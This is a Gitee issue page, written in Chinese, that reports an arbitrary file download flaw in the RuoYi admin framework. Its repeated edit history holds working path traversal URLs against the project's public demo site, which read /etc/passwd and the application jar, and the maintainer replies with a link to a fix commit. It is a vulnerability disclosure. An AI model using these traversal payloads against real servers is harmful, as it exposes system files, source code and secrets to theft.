任意文件读取漏洞紧急 · Issue #I25N4Y · 若依/RuoYi - Gitee.com

《关于清理 Gitee 水军刷 Star 行为公告》

开源项目 > WEB应用开发 > 后台管理框架 &&

/ 详情

已完成

创建于

2020-11-16 18:53

项目上线被扫除安全漏洞问题，可以下载服务器上任意文件。如下：
输入图片说明

输入图片说明

ruoyi在线demo 也复现了这个漏洞，任意文件下载

https://demo.ruoyi.vip/
输入图片说明

复现步骤如下：

登录 https://demo.ruoyi.vip/
打开以下链接会自动下载服务器上的文件（/etc/passwd可以替换为任意文件绝对路径）：
https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

下载的文件如下：

输入图片说明

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

输入图片说明

项目上线被扫除安全漏洞问题，可以下载服务器上任意文件 。如下：
![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

### ruoyi在线demo 也复现了这个漏洞，任意文件下载
 https://demo.ruoyi.vip/
![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/213301_88ea8585_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   
2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 
     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd
     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")
![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")
  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

创建了任务

将关联仓库设置为若依/RuoYi

修改了描述

修改了描述

修改了描述

原值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

新值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

   下次的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

>（/etc/passwd可以替换为任意文件绝对路径）

修改了描述

原值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

   下次的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

>（/etc/passwd可以替换为任意文件绝对路径）

新值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

   下次的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

修改了描述

原值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

   下次的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

新值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

   下次的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

修改了标题

修改了描述

原值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

   下次的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

新值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

修改了标题

修改了描述

原值

项目上线被扫除安全漏洞问题。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

版本信息如下（按照RuoYi文档 已升级到2.1.17.RELEASE）：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/192031_7d00fb44_5301618.png "屏幕截图.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

新值

项目上线被扫除安全漏洞问题，可以下载服务器上任意文件 。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

修改了描述

原值

项目上线被扫除安全漏洞问题，可以下载服务器上任意文件 。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

### ruoyi在线demo 也复现了这个漏洞 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/193746_bde7a0de_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

新值

项目上线被扫除安全漏洞问题，可以下载服务器上任意文件 。如下：

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185256_0f4ab650_5301618.png "Snipaste_2020-11-16_18-52-17.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/185306_5881b983_5301618.png "Snipaste_2020-11-16_18-51-54.png")

### ruoyi在线demo 也复现了这个漏洞，任意文件下载

 https://demo.ruoyi.vip/

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/213301_88ea8585_5301618.png "屏幕截图.png")

#### 复现步骤如下：

1. 登录 https://demo.ruoyi.vip/   

2. 打开以下链接会自动下载服务器上的文件 （/etc/passwd可以替换为任意文件绝对路径）： 

     https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd

     ![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/204925_496fec75_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205018_e74fca0c_5301618.png "屏幕截图.png")

  下载的文件如下：![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/205144_e8013cd8_5301618.png "屏幕截图.png")

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/211533_042170d7_5301618.png "屏幕截图.png")

demo源代码下载地址：https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

![输入图片说明](https://images.gitee.com/uploads/images/2020/1116/212940_93c3efd7_5301618.png "屏幕截图.png")

展开全部操作日志

嗯，多谢提醒。已修复。
阻止任意文件下载漏洞
https://gitee.com/y_project/RuoYi/commit/18f6366f2e6908a151e02d0c18f1aa490e7d0a54

将任务状态从 待办的 修改为已完成

请问下这是什么扫描器，挺厉害的

直接扫的若依的这个漏洞，没什么厉害的。这又不是什么0day

登录后才可以发表评论

状态

负责人

里程碑

Pull Requests

关联的 Pull Requests 被合并后可能会关闭此 issue

分支

开始日期 - 截止日期

-

置顶选项

优先级

参与者（4）

Java

1

https://gitee.com/y_project/RuoYi.git

git@gitee.com:y_project/RuoYi.git

y_project

RuoYi

RuoYi